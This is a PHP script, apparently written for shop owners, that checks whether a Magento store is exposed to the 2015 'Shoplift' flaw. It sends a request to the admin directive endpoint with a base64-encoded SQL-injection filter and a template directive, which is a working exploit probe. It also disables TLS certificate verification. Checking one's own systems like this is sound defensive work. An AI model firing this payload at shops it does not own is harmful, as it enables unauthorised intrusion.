<?php
/*
Kurzes PHP-Skript, das überprüft, ob der Magento-Shop
verwundbar ist durch die Shoplift-Attacke. #shoplift
Copyright (C) 2015 Fabian Bitter (fabian.bitter@me.com)
*/
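/**
 * Fetch a URL with cURL and return the response body.
 *
 * Issues a GET request by default. When $post is an array, its entries are
 * sent as an application/x-www-form-urlencoded POST body.
 *
 * @param string      $url  Address to request.
 * @param array|false $post Form fields (name => value), or false for a plain GET.
 *
 * @return string|false Response body, or false when the transfer failed.
 */
function post($url, $post = false) {
    $ch = curl_init();

    // NOTE(review): certificate and host-name verification are switched off.
    // Anyone on the network path can therefore substitute the response and
    // flip the verdict in either direction. Left unchanged so that shops with
    // self-signed certificates can still be checked; where the certificate is
    // valid, set CURLOPT_SSL_VERIFYPEER to true and CURLOPT_SSL_VERIFYHOST to 2.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    if ($post !== false) {
        // http_build_query() percent-encodes names and values. The values sent
        // by this script are base64 text, whose '+', '/' and '=' characters are
        // altered by form decoding when they are sent raw. It also avoids the
        // uninitialised accumulator, the discarded rtrim() result and the
        // count() on an undefined variable of the hand-rolled encoder.
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post, '', '&'));
    }

    // curl_exec() yields false on transport errors; callers must not treat
    // that as a valid (empty) response.
    $data = curl_exec($ch);
    curl_close($ch);

    return $data;
}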
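/**
 * Check whether a Magento shop shows the behaviour the file header calls "Shoplift".
 *
 * Sends one POST request to the shop's /admin/ directive endpoint and reports
 * whether the answer decodes as an image instead of the login page.
 *
 * A false result only means that this single probe did not return an image.
 * The request always targets the /admin/ path, so a shop whose admin area
 * lives under a different path is not reached and is not proven safe.
 *
 * @param string $url Absolute URL of the shop (scheme and host are required).
 *
 * @return bool True when the response body decodes as an image.
 *
 * @throws InvalidArgumentException When $url has no scheme or host.
 * @throws RuntimeException         When GD is unavailable or the request failed,
 *                                  i.e. the check is inconclusive.
 */
function check_if_magento_is_vulnerable($url) {
    $url_parts = parse_url($url);
    if ($url_parts === false || empty($url_parts["scheme"]) || empty($url_parts["host"])) {
        throw new InvalidArgumentException("Shop URL must be absolute and contain a scheme and a host.");
    }

    // Without GD the image test below cannot run at all.
    if (!function_exists("imagecreatefromstring")) {
        throw new RuntimeException("The GD extension is required to evaluate the response.");
    }

    // Keep an explicit port so shops on non-default ports are probed where they listen.
    $authority = $url_parts["host"];
    if (isset($url_parts["port"])) {
        $authority .= ":" . $url_parts["port"];
    }

    $data = post(
        sprintf(
            "%s://%s/admin/Cms_Wysiwyg/directive/index/",
            $url_parts["scheme"],
            $authority
        ),
        array(
            "filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"),
            "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
            "forwarded" => "1"
        )
    );

    // A failed transfer says nothing about the shop. Reporting it as
    // "not vulnerable" would be a false all-clear.
    if (!is_string($data)) {
        throw new RuntimeException("Request to the shop failed; the result is inconclusive.");
    }

    /*
    If the shop is vulnerable, a PNG file is returned at this point
    instead of the login page.
    */
    // '@' is deliberate: non-image data makes GD emit a warning, and that is
    // the expected outcome for a shop that answers with the login page.
    return (@imagecreatefromstring($data) !== false);
}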
// Placeholder address: set this to the URL of your own shop before running.
$your_shop_url = "http://www.deine-shop-adresse.de";

// A "nicht verwundbar" result only reflects this single probe against /admin/.
print check_if_magento_is_vulnerable($your_shop_url)
    ? "Die Seite ist verwundbar.\n"
    : "Die Seite ist nicht verwundbar.\n";